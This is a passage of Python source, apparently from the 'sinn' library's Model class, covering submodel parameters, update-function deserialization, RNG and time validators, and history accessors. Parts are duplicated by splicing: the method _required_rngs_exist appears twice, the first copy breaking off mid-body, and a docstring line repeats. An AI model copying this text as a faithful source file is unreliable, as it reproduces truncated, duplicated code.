The values then need to be propagated to the matching\n parameters of submodels.\n - submodel.Parameters may implement validation or normalization, which\n the model expects to be pre-applied to its parameter set.\n - Theano graphs will depend submodel.params, so\n a) we don't want to change the identity of those variables\n b) we want `model.subparams` and `submodel.params` to point to the\n same instances, so that either can be used in a graph.\n \"\"\"\n for submodelname, submodel in self.nested_models.items():\n subparams = getattr(self.params, submodelname)\n # Apply submodel's Parameters validator\n subparam_vals = submodel.Parameters.parse_obj(subparams).get_values()\n # Transfer parameter values to submodel\n submodel.params._set_values(subparam_vals)\n # Replace container parameter by corresponding instances of submodel\n for subθname, θ in submodel.params:\n assert subθname in subparams.__dict__, (\n f\"Subparameter set for submodel '{submodelname}' does not contain a parameter '{subθname}'.\")\n setattr(subparams, subθname, θ)\n # Update the variable name to include the parent model.\n # (with a guard in case we run this twice)\n if hasattr(θ, 'name') and submodelname not in θ.name:\n # (There are ways the test above can fail (e.g. if the\n # parameter's name is the same as the submodel's), but\n # those seem quite unlikely.\n θ.name = submodelname + \".\" + θ.name\n\n def _base_initialize(self,\n shallow_copy: bool=False,\n update_functions: Optional[dict]=None):\n \"\"\"\n Collects initialization that should be done in __init__, copy & parse_obj.\n\n Both arguments are meant for internal use and documented with comments\n in the source code.\n \"\"\"\n self.update_parameters_type()\n self.set_submodel_params()\n\n self._derivatives_view = DerivativesView(self)\n\n if update_functions is not None:\n # 1) update_functions should be a dict, and will override update function\n # defs from the model declaration.\n # This is used when deserializing a model; not really intended as a\n # user-facing option.\n # 2) Add @updatefunction decorator to those recognized by function deserializer\n # To avoid user surprises, we cache the current state of\n # HistoryUpdateFunction._deserialization_locals, update the variable,\n # then return to the original state once we are done\n # Remark: For explicitly passed update functions, we don't use the\n # 'PendingUpdateFunction' mechanism, so in fact\n # we just replace @updatefunction by an idempotent function.\n def idempotent(hist_nm, inputs=None):\n def dec(f):\n return f\n return dec\n # Stash _deserialization_locals\n stored_locals = HistoryUpdateFunction._deserialization_locals\n # Insert substitute @updatefunction decorator\n if 'updatefunction' not in HistoryUpdateFunction._deserialization_locals:\n HistoryUpdateFunction._deserialization_locals = HistoryUpdateFunction._deserialization_locals.copy()\n HistoryUpdateFunction._deserialization_locals['updatefunction'] = idempotent\n # Attach all explicitly passed update functions\n for upd_fn_key, upd_fn in update_functions.items():\n if upd_fn is None:\n continue\n hist_name, method_name = upd_fn_key.rsplit('.', 1)\n hist = getattr(self, hist_name)\n ns = upd_fn.get('namespace', self)\n if ns is not self:\n raise ValueError(\n \"Specifying the namespace of an update function is \"\n \"not necessary, and if done, should match the model \"\n \"instance where it is defined.\")\n upd_fn['namespace'] = self\n if method_name == \"update_function\":\n 
hist._set_update_function(HistoryUpdateFunction.parse_obj(upd_fn))\n elif method_name == \"range_update_function\":\n hist._set_range_update_function(HistoryUpdateFunction.parse_obj(upd_fn))\n else:\n raise ValueError(f\"Unknown update function '{method_name}'. \"\n \"Recognized values: 'update_function', 'range_update_function'.\")\n # Reset deserialization locals\n HistoryUpdateFunction._deserialization_locals = stored_locals\n\n # Otherwise, create history updates from the list of pending update\n # functions created by metaclass (don't do during shallow copy – histories are preserved then)\n if not shallow_copy:\n for obj in self._pending_update_functions:\n if update_functions and f\"{obj.hist_nm}.update_function\" in update_functions:\n # Update function was already set explicitly above\n continue\n hist = getattr(self, obj.hist_nm)\n hist._set_update_function(HistoryUpdateFunction(\n namespace = self,\n func = obj.fn, # HistoryUpdateFunction ensures `self` points to the model\n inputs = obj.inputs,\n # parent_model = self\n ))\n self._pending_update_functions = []\n object.__setattr__(self, 'graph_cache',\n GraphCache('.sinn.graphcache/models', type(self),\n modules=('sinn.models',)))\n object.__setattr__(self, 'compile_cache',\n CompiledGraphCache('.sinn.graphcache/models.compilecache'))\n # TODO: Add other dependencies within `sinn.models` ?\n # object.__setattr__(self, '_advance_updates', {})\n # object.__setattr__(self, '_compiled_advance_fns', {})\n # Keys of these dictionaries are tuples of histories passed to `integrate(histories=…)`,\n # i.e. extra histories to integrate along with the state.\n # Values of the first are update dictionaries\n # Values of the second are compiled Theano functions.\n # # Create symbolic variables for batches\n # if shim.cf.use_theano:\n # # # Any symbolic function on batches should use these, that way\n # # # other functions can retrieve the symbolic input variables.\n # start = np.array(1).astype(self.tidx_dtype)\n # object.__setattr__(self, 'batch_start_var',\n # shim.shared(start, name='batch_start'))\n # # # Must be large enough so that test_value slices are not empty\n # # size = np.array(2).astype(self.tidx_dtype)\n # # object.__setattr__(self, 'batch_size_var',\n # # shim.shared(size, name='batch_size'))\n # # # # Must be large enough so that test_value slices are not empty\n\n # Set the value of `connections` so that it reflects actual connections\n # TODO: Put in a root_validator (requires `nested_models` which works as class method)\n already_seen = {} # Keeps track of histories that have been seen\n conn_objs = {} # Connection pairs for objects in different submodels\n # Order: lower model.obj name : upper model.obj name,\n # where the \"lower\" model is the one which can be instantiated first\n # NB: The order in which we iterate over nested_models is set by\n # the order in which submodels are defined in the class\n for subnm, submodel in self.nested_models.items():\n for objnm, obj in ChainMap(submodel.nested_histories_with_repeats,\n submodel.nested_rngs_with_repeats).items():\n if id(obj) in already_seen:\n if already_seen[id(obj)] in conn_objs:\n logger.warning(\"Connecting a history to more than one \"\n \"other history is likely unsafe. The \"\n \"following history name will be lost: \"\n f\"{subnm}.{objnm}.\")\n conn_objs[already_seen[id(obj)]] = f\"{subnm}.{objnm}\"\n else:\n already_seen[id(obj)] = f\"{subnm}.{objnm}\"\n self.connections = conn_objs\n\n @abc.abstractmethod\n def initialize(self, initializer: Any=None):\n \"\"\"\n Models must define an `initialize` method. This is where you can add
This is where you can add\n padding to histories, pre-compute kernels, etc. – anything which should\n be done whenever parameters changed.\n\n It takes one optional keyword argument, `initializer`, which can be of\n any form; the model will accept an `initializer` argument at\n instantiation and pass it along to this method.\n This argument can be e.g. a string flag, to indicate one of multiple\n initialization protocols, or a dictionary with multiple initialization\n parameters.\n\n .. important:: Any left-padded history should be filled up to -1 after\n a call to `initialize`.\n\n Arguably this could be implemented as a `root_validator`, but for at\n least for now having a method with exactly this name is required.\n \"\"\"\n pass\n\n\n # @root_validator\n # def check_same_dt(cls, values):\n # hists = [h for h in values if isinstance(h, History)]\n # if any(h1.dt != h2.dt for h1,h2 in zip(hists[:-1], hists[1:])):\n # steps = \", \".join(f\"{str(h)} (dt={h.dt})\" for h in hists)\n # raise ValueError(\n # f\"Histories do not all have the same time step.\\n{steps}\")\n # return values\n\n @root_validator\n def consistent_times(cls, values):\n time = values.get('time', None)\n hists = (v for v in values if isinstance(v, History))\n if time is not None:\n for hist in hists:\n if not time.Index.is_compatible(hist.time.Index):\n raise ValueError(\n \"History and model have incompatible time indexes.\\n\"\n f\"History time index: {hist.time}\\n\"\n f\"Model time index: {time}\")\n return values\n\n # Called by validators in model implementations\n @classmethod\n def check_same_shape(cls, hists):\n if any(h1.shape != h2.shape for h1,h2 in zip(hists[:-1], hists[1:])):\n shapes = \", \".join(f\"{str(h)} (dt={h.shape})\" for h in hists)\n raise ValueError(\n f\"Histories do not all have the same time shape.\\n{shapes}\")\n return None\n\n @root_validator\n def required_rngs_exist(cls, values):\n \"\"\"\n Check that all required random number generators (rngs) are specified.\n This function is just a sanity check: it only ensures that the RNGs\n are not None, if any of the outputs are uncomputed.\n \"\"\"\n hists = values.get('histories', None)\n if hists is None: return values\n for h in hists:\n input_rng = [inp for inp in h.update_function.inputs\n if isinstance(inp, mtb.typing.AnyRNG)]\n if len(input_rng) > 0:\n Model._required_rngs_exist(h, input_rng)\n return values\n\n @staticmethod\n def _required_rngs_exist(outputs, rngs):\n \"\"\"\n Utility function for `required_rngs_exist`.\n\n Parameters\n ----------\n outputs: History\n Can also be a list of Histories\n rngs: random stream, or list of random streams\n The random stream(s) required to generate the histories in\n `outputs`\n\n Raises\n ------\n ValueError:\n If at least one RNG is `None` and at least one of the `outputs`\n is both unlocked and not fully computed.\n\n Warnings\n -------\n UserWarning:\n If all histories are already computed but an RNG is specified,\n since in this case the RNG is not used.\n \"\"\"\n if isinstance(outputs, History):\n outputs = [outputs]\n else:\n if not all(isinstance(output, History) for output in outputs):\n raise AssertionError(\"Model.required_rngs_exist: not all listed outputs \"\n f\"are histories.\\nOutputs: {outputs}.\")\n try:\n len(rngs)\n except TypeError:\n rngs = [rngs]\n\n # if any( not shim.isshared(outhist._sym_data) for outhist in outputs ):\n # # Bypass test for Theano data\n # return\n\n unlocked_hists = [h for h in outputs if not h.locked]\n hists_with_missing_rng = []\n 
@staticmethod\n def _required_rngs_exist(outputs, rngs):\n \"\"\"\n Utility function for `required_rngs_exist`.\n\n Parameters\n ----------\n outputs: History\n Can also be a list of Histories\n rngs: random stream, or list of random streams\n The random stream(s) required to generate the histories in\n `outputs`\n\n Raises\n ------\n ValueError:\n If at least one RNG is `None` and at least one of the `outputs`\n is both unlocked and not fully computed.\n\n Warns\n -----\n UserWarning:\n If all histories are already computed but an RNG is specified,\n since in this case the RNG is not used.\n \"\"\"\n if isinstance(outputs, History):\n outputs = [outputs]\n else:\n if not all(isinstance(output, History) for output in outputs):\n raise AssertionError(\"Model.required_rngs_exist: not all listed outputs \"\n f\"are histories.\\nOutputs: {outputs}.\")\n try:\n len(rngs)\n except TypeError:\n rngs = [rngs]\n\n # if any( not shim.isshared(outhist._sym_data) for outhist in outputs ):\n # # Bypass test for Theano data\n # return\n\n unlocked_hists = [h for h in outputs if not h.locked]\n hists_with_missing_rng = []\n hists_with_useless_rng = []\n for h in outputs:\n hinputs = h.update_function.inputs\n if not h.locked and h.cur_tidx < h.tnidx:\n missing_inputs = \", \".join(\n nm for nm, inp in zip(\n h.update_function.input_names, hinputs)\n if inp is None)\n if len(missing_inputs) > 0:\n hists_with_missing_rng.append(f\"{h.name}: {missing_inputs}\")\n else:\n useless_rng = \", \".join(\n nm for nm, inp in zip(\n h.update_function.input_names, hinputs)\n if isinstance(inp, shim.config.RNGTypes))\n if len(useless_rng) > 0:\n hists_with_useless_rng.append(f\"{h.name}: {useless_rng}\")\n if len(hists_with_missing_rng):\n missing = \"\\n\".join(hists_with_missing_rng)\n raise ValueError(\n \"The following histories are missing the following inputs:\\n\"\n + missing)\n if len(hists_with_useless_rng):\n useless = \"\\n\".join(hists_with_useless_rng)\n warn(\"The random inputs to the following histories will be \"\n \"ignored, since the histories are already computed:\\n\"\n \"(hist name: random input)\\n\" + useless)\n\n # ==========================================\n # Specializations of standard dunder methods\n # ==========================================\n\n def __str__(self):\n name = self.name\n return \"Model '{}' (t0: {}, tn: {}, dt: {})\" \\\n .format(name, self.t0, self.tn, self.dt)\n\n def __repr__(self):\n return f\"<{str(self)}>\"\n\n def _repr_html_(self):\n summary = self.get_summary()\n topdivline = '<div>'
modelline = f'<p><b>Model {summary.model_name}'\n if isinstance(self, Model): # Eventually we want to be able to call this on the class\n modelline += f' (t0: {self.t0}, tn: {self.tn}, dt: {self.dt})'\n modelline += '</b></p>'\n topulline = '<ul>'\n stateline = '<li>State variables: '\n stateline += ', '.join([f'{v}' for v in summary.state_vars])\n stateline += '</li>'\n paramblock = '<li>Parameters\\n<ul>\\n'\n if isinstance(summary.params, IndexableNamespace):\n for name, val in summary.params:\n paramblock += f'<li>{name}={val}</li>\\n'\n else:\n for name in summary.params:\n paramblock += f'<li>{name}</li>\\n'\n paramblock += '</ul>\\n</li>'\n updfnblock = \"\"\n for varname, upd_code in summary.update_functions.items():\n updfnblock += f'<li>Update function for {varname}\\n'\n updfnblock += f'<pre>{upd_code}</pre>\\n</li>\\n'\n if not summary.nested_models:\n nestedblock = \"\"\n else:\n nestedblock = '<li>Nested models:\\n<ul>'\n for nestedmodel in summary.nested_models:\n nestedblock += f'<li>{nestedmodel._repr_html_()}</li>'\n nestedblock += '</ul></li>\\n'\n\n return \"\\n\".join([\n topdivline, modelline, topulline, stateline,\n paramblock, updfnblock, nestedblock,\n \"</ul>\", \"</div>\"])
@property\n def name(self) -> str:\n return getattr(self, '__name__', type(self).__name__)\n\n @property\n def nonnested_histories(self) -> Dict[str, History]:\n return {nm: getattr(self, nm) for nm in self._hist_identifiers}\n @property\n def nonnested_history_set(self) -> Set[History]:\n return {getattr(self, nm) for nm in self._hist_identifiers}\n def _nested_histories(self, include_repeats=False) -> Generator[Tuple[str, History]]:\n already_seen = set()\n for hnm, h in self.nonnested_histories.items():\n already_seen.add(id(h))\n yield hnm, h\n for submodel_nm, submodel in self.nested_models.items():\n for hist_nm, hist in submodel._nested_histories(include_repeats):\n if include_repeats or id(hist) not in already_seen:\n already_seen.add(id(hist))\n yield (f\"{submodel_nm}.{hist_nm}\", hist)\n @property\n def nested_histories(self) -> Dict[str,History]:\n \"\"\"\n Return the model's histories as {name: History} pairs, with the names\n of nested histories prefixed by their submodel name: \"{submodel}.{name}\".\n Histories shared between submodels are returned only once.\n \"\"\"\n return dict(self._nested_histories())\n # **{f\"{submodel_nm}.{hist_nm}\": hist\n # for submodel_nm, submodel in self.nested_models.items()\n # for hist_nm, hist in submodel.nested_histories.items()}}\n @property\n def nested_histories_with_repeats(self) -> Dict[str,History]:\n \"\"\"\n Return the model's histories as {name: History} pairs, with the names\n of nested histories prefixed by their submodel name: \"{submodel}.{name}\".\n Histories shared between submodels are returned multiple times.\n \"\"\"\n return dict(self._nested_histories(include_repeats=True))\n @property\n def history_set(self) -> Set[History]:\n return set(chain(self.nonnested_history_set,\n *(m.history_set for m in self.nested_models_list)))\n @property\n def nonnested_kernels(self) -> Dict[str, Kernel]:\n return {nm: getattr(self, nm) for nm in self._kernel_identifiers}\n @property\n def nonnested_kernel_list(self) -> List[Kernel]:\n return [getattr(self, nm) for nm in self._kernel_identifiers]\n @property\n def kernel_list(self) -> List[Kernel]:\n return list(chain(self.nonnested_kernel_list,\n *(m.kernel_list for m in self.nested_models_list)))\n @property\n def nested_models(self) -> Dict[str, Model]:\n return {nm: getattr(self, nm) for nm in self._model_identifiers}\n @property\n def nested_models_list(self) -> List[Model]:\n return [getattr(self, nm) for nm in self._model_identifiers]\n\n @property\n def derivatives(self) -> DerivativesView:\n return self._derivatives_view\n\n @property\n def initial_value(self) -> Dict[str,Tensor]:\n return {nm: h[:self.t0] for nm, h in self.nested_histories.items()}\n\n @property\n def t0(self):\n return self.time.t0\n @property\n def tn(self):\n return self.time.tn\n @property\n def t0idx(self):\n return self.time.t0idx\n @property\n def tnidx(self):\n return self.time.tnidx\n @property\n def tidx_dtype(self):\n return self.time.Index.dtype\n @property\n def dt(self):\n return self.time.dt\n\n @property\n def statehists(self) -> utils.FixedGenerator:\n nested_len = sum(len(m.statehists) for m in self.nested_models_list)\n return utils.FixedGenerator(\n chain(\n (getattr(self, varname) for varname in self.State.__annotations__),\n *(m.statehists for m in self.nested_models_list)),\n nested_len + len(self.State.__annotations__) )\n\n @property\n def unlocked_statehists(self) -> Generator[History]:\n return (h for h in self.statehists if not h.locked)
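 # Illustrative sketch of the accessors above (`model` and the submodel\n # and history names are hypothetical):\n #\n # >>> model.nested_histories          # {'x': <Series>, 'sub.y': <Series>}\n # >>> list(model.unlocked_statehists) # state histories that can still be updated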
@property\n def locked_statehists(self) -> Generator[History]:\n return (h for h in self.statehists if h.locked)\n\n @property\n def locked_histories(self) -> Generator[History]:\n return (h for h in self.history_set if h.locked)\n\n @property\n def unlocked_histories(self) -> Generator[History]:\n return (h for h in self.history_set if not h.locked)\n\n @property\n def nonstatehists(self) -> utils.FixedGenerator:\n statehists = list(self.statehists)\n return utils.FixedGenerator(\n (h for h in self.history_set if h not in statehists),\n len(self.history_set) - len(self.statehists) )\n\n @property\n def unlocked_nonstatehists(self):\n return (h for h in self.nonstatehists if not h.locked)\n\n @property\n def rng_inputs(self) -> List[mtb.typing.AnyRNG]:\n \"\"\"\n Return a list of all RNGs on which _unlocked_ histories depend.\n RNGs which only appear as inputs for _locked_ histories are excluded;\n thus the returned list can usually be assumed to be those RNGs which\n would be triggered by integration, with the current lock statuses.\n \"\"\"\n rng_inputs = []\n for h in self.unlocked_histories:\n for nm in h.update_function.input_names:\n inp = getattr(h.update_function.namespace, nm)\n if (isinstance(inp, shim.config.RNGTypes)\n and inp not in rng_inputs):\n rng_inputs.append(inp)\n return rng_inputs\n\n @property\n def nonnested_rngs(self) -> Dict[str, mtb.typing.AnyRNG]:\n d = {}\n for attr in self.__fields__:\n obj = getattr(self, attr, None)\n if isinstance(obj, shim.config.RNGTypes):\n d[attr] = obj\n return d\n def _nested_rngs(self, include_repeats=False) -> Generator[Tuple[str,mtb.typing.AnyRNG]]:\n already_seen = set()\n for rng_nm, rng in self.nonnested_rngs.items():\n already_seen.add(id(rng))\n yield rng_nm, rng\n for submodel_nm, submodel in self.nested_models.items():\n for rng_nm, rng in submodel._nested_rngs(include_repeats):\n if include_repeats or id(rng) not in already_seen:\n already_seen.add(id(rng))\n yield (f\"{submodel_nm}.{rng_nm}\", rng)\n @property\n def nested_rngs(self) -> Dict[str, mtb.typing.AnyRNG]:\n return dict(self._nested_rngs())\n # **{f\"{submodel_nm}.{rng_nm}\": rng\n # for submodel_nm, submodel in self.nested_models.items()\n # for rng_nm, rng in submodel.nested_rngs.items()}}\n @property\n def nested_rngs_with_repeats(self) -> Dict[str, mtb.typing.AnyRNG]:\n return dict(self._nested_rngs(include_repeats=True))\n\n @property\n def rng_hists(self) -> List[History]:\n \"\"\"\n Return a list of stochastic histories (those with an RNG as input).\n \"\"\"\n rng_hists = []\n for h in self.unlocked_histories:\n for nm in h.update_function.input_names:\n inp = getattr(h.update_function.namespace, nm)\n if isinstance(inp, shim.config.RNGTypes):\n rng_hists.append(h)\n break\n return rng_hists
def get_min_tidx(self, histories: Sequence[History]):\n \"\"\"\n Return the earliest time index for which all histories are computed.\n \"\"\"\n try:\n return min(h.cur_tidx.convert(self.time.Index)\n for h in histories)\n except IndexError as e:\n raise IndexError(\n \"Unable to determine a current index for \"\n f\"{self.name}. This usually happens when accessing \"\n \"`cur_tidx` before a model is initialized.\") from e\n\n @property\n def cur_tidx(self):\n \"\"\"\n Return the earliest time index for which all state histories are computed.\n \"\"\"\n if not self.statehists:\n raise RuntimeError(\"`cur_tidx` is undefined for a model with no \"\n \"state histories, since any time point can be \"\n \"computed at any time.\\nIf you need an anchor \"\n \"time point for building a computational graph, \"\n \"use `num_tidx` instead.\")\n return self.get_min_tidx(self.statehists)\n\n @property\n def cur_t(self):\n \"\"\"\n Returns the time up to which all state histories are computed.\n Equivalent to `self.time[self.cur_tidx]`.\n \"\"\"\n return self.time[self.cur_tidx]\n\n # Symbolic variables for use when compiling unanchored functions\n # Building as `shim.tensor(np.array(...))` assigns a test value to the\n # variable, allowing models to work with compute_test_value != 'ignore'\n # (As is required for PyMC3)\n # Stop test value should be at least 2 more than _curtidx, because scan runs\n # from `_curtidx + 1` to `stoptidx`.\n @property\n def curtidx_var(self):\n \"\"\"\n Return a purely symbolic variable intended to represent the current\n time index of the model (i.e. all state histories have been computed\n up to this point inclusively).\n\n Always returns the same object, so that it can be substituted in\n computational graphs.\n\n .. Note:: Like all user-facing indices, this should be treated as an\n *axis index*, not a data index.\n \"\"\"\n # It's important to guard with hasattr, because `self.curtidx_var`\n # must always return the same variable.\n if not hasattr(self, '_curtidx_var'):\n object.__setattr__(self, '_curtidx_var',\n shim.tensor(np.array(1, dtype=self.tidx_dtype),\n name='curtidx (model)'))\n return self._curtidx_var\n @property\n def stoptidx_var(self):\n \"\"\"\n Return a purely symbolic variable intended to represent the end point\n (exclusive) of a computation.\n\n Always returns the same object, so that it can be substituted in\n computational graphs.\n\n .. Note:: Like all user-facing indices, this should be treated as an\n *axis index*, not a data index.\n \"\"\"\n if not hasattr(self, '_stoptidx_var'):\n object.__setattr__(self, '_stoptidx_var',\n shim.tensor(np.array(3, dtype=self.tidx_dtype),\n name='stoptidx (model)'))\n return self._stoptidx_var\n @property\n def batchsize_var(self):\n \"\"\"\n Return a purely symbolic variable intended to represent the batch size.\n This is sometimes more convenient in functions than specifying the end\n point.\n\n Always returns the same object, so that it can be substituted in\n computational graphs.\n \"\"\"\n if not hasattr(self, '_batchsize_var'):\n object.__setattr__(self, '_batchsize_var',\n shim.tensor(np.array(2, dtype=self.tidx_dtype),\n name='batchsize (model)'))\n return self._batchsize_var\n\n def get_num_tidx(self, histories: Sequence[History]):\n \"\"\"\n A shared variable corresponding to the current time point of\n the model. This is only defined if all histories are synchronized.\n (*Locked* histories need not be synchronized, but must be computed at\n least as far as unlocked histories.)\n\n Special case: if all listed histories are locked (or `histories` is\n empty), then a tidx corresponding to `self.t0idx` is returned.\n Rationale: the time point of locked histories is meaningless, since\n they cannot be updated, and it makes no sense to force them to be\n synchronized. 
The only thing we expect is that whatever value is\n returned by `num_tidx` is already computed for all locked histories.\n Since the purpose of this method is to return a time index suitable\n for constructing a graph, if there are no histories to update, the time\n point itself does not matter. Thus we return the index corresponding to\n t0, since this requires the least data.\n\n Always returns the same object, so that it can be substituted in\n computational graphs.\n\n Raises `RuntimeError` if histories are not all synchronized.\n\n .. WARNING::\n This does not return an AxisIndex, so always wrap this variable\n with [model].time.Index or [model].time.Index.Delta before using\n it to index into a history.\n\n .. Warning::\n Each computational graph should only involve calls to `get_num_tidx`\n with the same list of histories. Different lists of histories\n may return different objects. Different objects will also be\n returned if the lock status of some histories changes.\n\n .. Dev note::\n If we can find a way to make SymbolicAxisIndexMeta._instance_plain\n return the original underlying symbolic variable (the one which\n appears in graphs), I will gladly change this method to return a\n proper symbolic index.\n\n Parameters\n ----------\n histories: Set of histories\n \"\"\"\n # TODO: Since we assert that all unlocked state histories are\n # synchronized, I'm not sure how useful it is to also allow `histories`\n # to be specified (we could just always use unlocked state hists)\n if not self.histories_are_synchronized():\n L = max(len(hnm) for hnm in self.nested_histories)\n tidcs = \"\\n\".join(f\"{hnm:<{L}}: {h.cur_tidx.convert(self.time.Index)}\"\n for hnm, h in self.nested_histories.items()\n if not h.locked)\n raise RuntimeError(\n f\"Unlocked histories for the {self.name} model are not all \"\n \"computed up to the same point, or further than some locked \"\n \"histories. The compilation of the model's integration function \"\n \"is ill-defined in this case.\\nTime indexes for unlocked \"\n f\"histories (converted to model's time axis):\\n{tidcs}\")\n unlocked_histories = [h for h in histories if not h.locked]\n if unlocked_histories:\n key = tuple(id(h) for h in unlocked_histories)\n tidx = self.get_min_tidx(unlocked_histories)\n else:\n # DEV NOTE: I put this restriction here because all current use cases\n # for `num_tidx` are to index into the history, hence we need\n # a value at which the histories are computed. But theoretically\n # it could also return a negative index if nothing is computed,\n # like History.cur_tidx does. 
The issue then is what is the most\n # sensible thing to do if histories have different left padding.\n _locked_histories = list(self.locked_histories) # Consume generator\n if _locked_histories:\n assert self.get_min_tidx(_locked_histories) >= self.t0idx, \\\n \"`get_num_tidx` requires histories be computed at least up to `t0idx`\"\n key = ()\n tidx = self.t0idx\n if key not in self._num_tidx_objs:\n self._num_tidx_objs[key] = shim.shared(\n np.array(tidx, dtype=self.tidx_dtype), f\"t_idx ({self.name})\")\n else:\n self._num_tidx_objs[key].set_value(tidx)\n return self._num_tidx_objs[key]\n\n @property\n def num_tidx(self):\n \"\"\"\n Return a shared variable suitable to use as an anchor time index for\n building computational graphs.\n \"\"\"\n return self.get_num_tidx(self.statehists)\n\n def histories_are_synchronized(self):\n \"\"\"\n Return True if all unlocked state hists are computed to the same time\n point, and all locked histories at least up to that point.\n \"\"\"\n try:\n tidcs = [h.cur_tidx.convert(self.time.Index)\n for h in self.unlocked_statehists]\n except IndexError:\n # If conversion fails, it's because the converted index would be out\n # of the range of the new hist => hists clearly not synchronized\n return False\n locked_tidcs = [h.cur_tidx.convert(self.time.Index)\n for h in self.locked_statehists]\n if len(tidcs) == 0:\n return True\n earliest = min(tidcs)\n latest = max(tidcs)\n if earliest != latest:\n return False\n elif any(ti < earliest for ti in locked_tidcs):\n return False\n else:\n return True\n\n def get_tidx(self, t, allow_rounding=False):\n # Copied from History.get_tidx\n if self.time.is_compatible_value(t):\n return self.time.index(t, allow_rounding=allow_rounding)\n else:\n # assert self.time.is_compatible_index(t)\n assert shim.istype(t, 'int')\n if (isinstance(t, sinn.axis.AbstractAxisIndexDelta)\n and not isinstance(t, sinn.axis.AbstractAxisIndex)):\n raise TypeError(\n \"Attempted to get the absolute time index corresponding to \"\n f\"{t}, but it is an index delta.\")\n return self.time.Index(t)\n get_tidx.__doc__ = History.get_tidx.__doc__\n\n def get_tidx_for(self, t, target_hist, allow_fractional=False):\n raise DeprecationWarning(\"Use the `convert` method attached to the AxisIndex.\")\n\n def index_interval(self, Δt, allow_rounding=False):\n return self.time.index_interval(Δt,\n allow_rounding=allow_rounding)\n index_interval.__doc__ = TimeAxis.index_interval.__doc__\n\n def get_time(self, t):\n # Copied from History.get_time; keep the two implementations in sync\n # TODO: Is it OK to enforce single precision ?\n if shim.istype(t, 'int'):\n # Either we have a bare int, or an AxisIndex\n if isinstance(t, sinn.axis.AbstractAxisIndex):\n t = t.convert(self.time)\n elif isinstance(t, sinn.axis.AbstractAxisIndexDelta):\n raise TypeError(f\"Can't retrieve the time corresponding to {t}: \"\n \"it's a relative, not absolute, time index.\")\n return self.time[t]\n else:\n assert self.time.is_compatible_value(t)\n # `t` is already a time value -> just return it\n return t\n\n get_time.__doc__ = History.get_time.__doc__\n\n # ------------------------\n # User-facing descriptions\n\n @class_or_instance_method\n def get_summary(self, hists=None):\n summary = SimpleNamespace()\n summary.model_name = self.name\n State = getattr(self, 'State', None)\n if State:\n summary.state_vars = list(State.__annotations__)\n else:\n summary.state_vars = []\n if isinstance(self, type):\n Parameters = getattr(self, 'Parameters', 
None)\n if Parameters:\n summary.params = list(Parameters.__annotations__)\n else:\n summary.params = []\n else:\n params = getattr(self, 'params', None)\n if params:\n summary.params = params.get_values()\n else:\n summary.params = {}\n summary.update_functions = self.get_update_summaries(hists)\n summary.nested_models = list(self.nested_models.values())\n return summary\n\n @class_or_instance_method\n def get_update_summaries(self, hists=None) -> Dict[str,str]:\n \"\"\"\n For selected histories, return a string summarizing the update function.\n By default, the histories summarized are those of `self.state`.\n May be called on the class itself, or an instance.\n\n Parameters\n ----------\n hists: list | tuple of histories or str\n List of histories to summarize.\n For each history given, retrieves its update function.\n Alternatively, a history's name can be given as a string\n\n Returns\n -------\n Dict[str,str]: {hist name: hist upd code}\n \"\"\"\n # Default for when `hists=None`\n if hists is None:\n State = getattr(self, 'State', None)\n if State:\n hists = list(self.State.__annotations__.keys())\n else:\n hists = []\n # Normalize to all strings; take care that identifiers may differ from the history's name\n histsdict = {}\n nonnested_hists = getattr(self, 'nonnested_histories', {})\n for h in hists:\n if isinstance(h, History):\n h_id = None\n for nm, hist in nonnested_hists.items():\n if hist is h:\n h_id = nm\n break\n if h_id is None:\n continue\n h_nm = h.name\n else:\n assert isinstance(h, str)\n if h not in self.__annotations__:\n continue\n h_id = h\n h_nm = h\n histsdict[h_id] = h_nm\n hists = histsdict\n funcs = {pending.hist_nm: pending.fn\n for pending in self._pending_update_functions}\n if not all(isinstance(h, str) for h in hists):\n raise ValueError(\n \"`hists` must be a list of histories or history names.\")\n\n # For each function, retrieve its source\n srcs = {}\n for hist_id, hist_nm in hists.items():\n fn = funcs.get(hist_id, None)\n if fn is None:\n continue\n src = inspect.getsource(fn)\n # Check that the source defines a function as expected:\n # first non-decorator line should start with 'def'\n for line in src.splitlines():\n if line.strip()[:1] == '@':\n continue\n elif line.strip()[:3] != 'def':\n raise RuntimeError(\n \"Something went wrong when retrieving an update function's source. \"\n \"Make sure the source file is saved and try reloading the Jupyter \"\n \"notebook. 
Source should start with `def`, but we got:\\n\" + src)\n else:\n break\n # TODO: Remove indentation common to all lines\n if hist_id != hist_nm:\n hist_desc = f\"{hist_id} ({hist_nm})\"\n else:\n hist_desc = hist_id\n srcs[hist_desc] = src.split('\\n', 1)[1]\n # 'split' is used to replace the `def` line: callers use\n # the `hist_desc` value to create a more explicit string\n return srcs\n\n @class_or_instance_method\n def summarize(self, hists=None):\n nested_models = self._model_identifiers\n if isinstance(self, type):\n name = getattr(self, '__name__', type(self).__name__) # Copied from `def name()`, so it works also when called as a class method\n nameline = \"Model '{}'\".format(name)\n paramline = \"Parameters: \" + ', '.join(getattr(self.Parameters, '__annotations__', [\"\"])) + \"\\n\"\n if len(nested_models) == 0:\n nestedline = \"\"\n else:\n nestedline = \"Nested models:\\n \" + '\\n '.join(nested_models)\n nestedline = nestedline + \"\\n\"\n nested_summaries = []\n else:\n assert isinstance(self, Model)\n nameline = str(self)\n if hasattr(self, 'params'):\n paramline = f\"Parameters: {self.params}\\n\"\n else:\n paramline = \"Parameters: None\\n\"\n if len(nested_models) == 0:\n nestedline = \"\"\n else:\n nestedlines = [f\" {attr} -> {type(cls).__name__}\"\n for attr, cls in self.nested_models.items()]\n nestedline = \"Nested models:\\n\" + '\\n'.join(nestedlines) + \"\\n\"\n nested_summaries = [model.summarize(hists)\n for model in self.nested_models.values()]\n nameline += '\\n' + '-'*len(nameline) + '\\n' # Add separating line under name\n try:\n stateline = \"State variables: \" + ', '.join(self.State.__annotations__)\n except AttributeError:\n stateline = \"State variables: \"\n stateline = stateline + \"\\n\"\n updateblock = '\\n\\n'.join([\n f\"Update function for {hist_desc}:\\n\" + upd_src\n for hist_desc, upd_src in self.get_update_summaries(hists).items()])\n summary = (nameline + stateline + paramline + nestedline\n + '\\n' + updateblock)\n return '\\n'.join((summary, *nested_summaries))\n\n def print_parameter_info(self, indent=0):\n \"\"\"\n Print for each parameter a set of info typically useful for debugging:\n Python type, NumPy dtype, Theano broadcast pattern / dimensions,\n shape (if numeric value). 
